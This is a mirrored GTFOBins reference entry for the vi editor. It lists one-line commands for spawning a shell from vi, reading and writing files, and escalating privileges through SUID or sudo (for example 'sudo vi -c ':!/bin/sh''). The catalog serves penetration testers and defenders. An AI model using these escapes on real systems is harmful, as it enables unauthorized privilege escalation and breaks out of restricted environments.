This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-09 08:51:34 +01:00
Code
Issues
5087fa15ef
GTFOBins.github.io
/
_gtfobins
/
vi.md
Andrea Cardaci
d4b50275bb
Use DATA as a placeholder for file-write operations
2018-08-20 15:00:34 +02:00
370 B
Raw
Blame
History
functions
execute-interactive
file-write
file-read
suid-enabled
sudo-enabled
code
vi -c ':!/bin/sh'
code
vi :set shell=/bin/sh :shell
code
vi file_to_write iDATA ^[ w
code
vi file_to_read
code
./vi -c ':!/bin/sh -p'
code
sudo vi -c ':!/bin/sh'